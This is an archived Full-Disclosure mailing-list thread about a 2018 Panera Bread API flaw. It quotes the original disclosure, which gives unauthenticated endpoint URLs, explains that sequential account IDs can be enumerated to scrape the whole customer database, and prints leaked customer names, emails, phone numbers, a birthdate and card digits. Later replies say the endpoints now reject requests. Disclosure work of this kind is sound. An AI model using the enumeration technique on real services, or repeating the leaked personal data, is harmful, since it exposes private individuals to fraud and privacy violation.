lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <5AC79112.5000204@keck.us> Date: Fri, 6 Apr 2018 10:24:02 -0500 From: Cornelius Keck <insecure@...k.us> To: "(RS) Tyler Schroder" <redorhcs@...coded.com>, Jack Beanstalk <pnrabrdthrwy@...il.com>, "fulldisclosure@...lists.org" <fulldisclosure@...lists.org> Subject: Re: [FD] Massive Breach in Panera Bread The fact that this port is not only still open, but also returns a well-formed response, is a concern. Of course they could just return that string, and keep a list of whoever is trying to talk to that port. (RS) Tyler Schroder wrote: > A correction seems to be issued for both endpoints, POC links are returning > "INVALID_SESSION". Might still be breakable given some time, but something > tells me they're getting a lot of free pentesting right now :) > > R. S. Tyler Schroder > > -----Original Message----- > From: Fulldisclosure [mailto:fulldisclosure-bounces@...lists.org] On Behalf > Of Jack Beanstalk > Sent: Monday, April 2, 2018 3:43 PM > To: fulldisclosure@...lists.org > Subject: [FD] Massive Breach in Panera Bread > > 7682200f0cd27a4f1a3c2301941d959aae7abf89136c38a4f1ded4d2bb7a67d7 > > I'd like to report a security vulnerability in Panera Bread's web > application. There is a publicly available, completely unauthenticated API > endpoint that allows anyone to access the following information about anyone > who has ever signed up for an account to order food from Panera Bread: > > 1. Username > > 2. First and last name > > 3. Email address > > 4. Phone number > > 5. Birthday > > 6. Last four digits of saved credit card number > > 7. Saved home address > > 8. Social account integration information > > 9. Saved user food preferences and dietary restrictions > > Here are the API endpoints which you can use to verify this information: > > 1. https://delivery.panerabread.com/foundation-api/users/by-phone/9140000000 > > This returns the following JSON: > > {"accounts": [{"username":"denys","name":"romona > ruiz","cardNumber":"********6515"},{"username":"mhmulcahy@...mail.com","name > ":"Marie > Mulcahy","cardNumber":"********5527"},{"username":"fenrny@....com","name":"F > B","cardNumber":"********7921"},{"username":"sabooky1@...oo.com","name":"C > Davis","cardNumber":"********7108"},{"username":"jorgeialcalde","name":"Jorg > e > Alcalde","cardNumber":"********6129"},{"username":"ktennister37@....com","na > me":"Kei > Kino","cardNumber":"********6061"},{"username":"gettingbetter812@...oo.com", > "name":"jan > jones","cardNumber":"********8950"},{"username":"kennny","name":"kenny > poteat","cardNumber":"********4412"},{"username":"angelo151","name":"angelo > ianello","cardNumber":"********8386"},{"username":"dblaperch@....com","name" > :"Deborah > LaPerch","cardNumber":"********5384"},{"username":"bagnoni1@...online.net"," > name":"sadie > bagnoni","cardNumber":"********5144"},{"username":"arsbreva@...mail.com","na > me":"Marea > needle","cardNumber":"********7488"},{"username":"contessa1234","name":"CONT > ESSA > SLEDGE","cardNumber":"********6702"},{"username":"lindapam","name":"elizabet > h > forlenzo","cardNumber":"********7085"},{"username":"jue-95@...mail.com","nam > e":"juline > G","cardNumber":"********4220"},{"username":"gleuanter","name":"Leo > Zinder","cardNumber":"********9123"},{"username":"artlaura","name":"arthur > hanson","cardNumber":"********8139"},{"username":"dlongua","name":"denise > longua","cardNumber":"********0102"},{"username":"homestead19-86@....com","n > ame":"Sandra > Baglione","cardNumber":"********6851"},{"username":"kilsha22","name":"kicia > fulchek","cardNumber":"********2654"}]} > > Note that you can look up usernames/email addresses for Panera Bread > accounts if you know the target's phone number. This returns the > username/email address and last four digits of the saved credit card of > every user who has ever signed up with that phone number. > > 2. https://delivery.panerabread.com/foundation-api/users/uramp/7382194 > > This returns the following JSON: > > {"customerId":7382194,"username":"abcascio@....net","firstName":"Anthony","l > astName":"Cascio","loyalty":{"cardNumber":"603077990852"},"emails":[{"id":23 > 860763,"emailAddress":"abcascio@....net","emailType":"Personal","isDefault": > true,"isOpt":true,"isVerified":true}],"phones":[{"id":18295989,"phoneNumber" > :"7032662951","phoneType":"Residential","countryCode":"1","extension":null," > name":null,"isSmsOpt":false,"isCallOpt":false,"isDefault":true,"isValid":tru > e,"smsPreferences":[{"programName":"Delivery","isOpt":false,"isOptPending":f > alse}]}],"isSmsGlobalOpt":false,"isEmailGlobalOpt":true,"isMobilePushOpt":fa > lse,"birthDate":{"birthDay":"25","birthMonth":"05","birthYear":"1948"},"user > Preferences":{"foodPreferences":[{"code":3,"displayName":"Low > Fat"}],"gatherPreference":{"code":7,"displayName":"Meal with > family"}},"subscriptions":{"subscriptions":[{"subscriptionCode":1,"displayNa > me":"Reward > Reminders & Expiration > Alerts","isSubscribed":false,"tncVersion":null},{"subscriptionCode":2,"displ > ayName":"Panera > Bread Updates & Special > Offers","isSubscribed":false,"tncVersion":null}],"suppressors":[{"suppressio > nCode":1,"displayName":"Catering","isSuppressed":false},{"suppressionCode":2 > ,"displayName":"CPG","isSuppressed":false}]},"addresses":[],"paymentOptions" > :{"creditCards":[],"payPals":[],"giftCards":[],"corporateCateringAccounts":[ > ]},"taxExemptions":null,"socialIntegration":null,"favoriteCafes":[]} > > In this context, "7382194" is the user's account ID. Panera Bread uses > sequential integers for account IDs, which means that if your goal is to > gather as much information as you can instead about someone, you can simply > increment through the accounts and collect as much as you'd like, up to and > including the entire database. > > Hopefully they'll fix this if it gets enough attention. > > _______________________________________________ > Sent through the Full Disclosure mailing list > https://nmap.org/mailman/listinfo/fulldisclosure > Web Archives & RSS: http://seclists.org/fulldisclosure/ > > > > > _______________________________________________ > Sent through the Full Disclosure mailing list > https://nmap.org/mailman/listinfo/fulldisclosure > Web Archives & RSS: http://seclists.org/fulldisclosure/ > _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists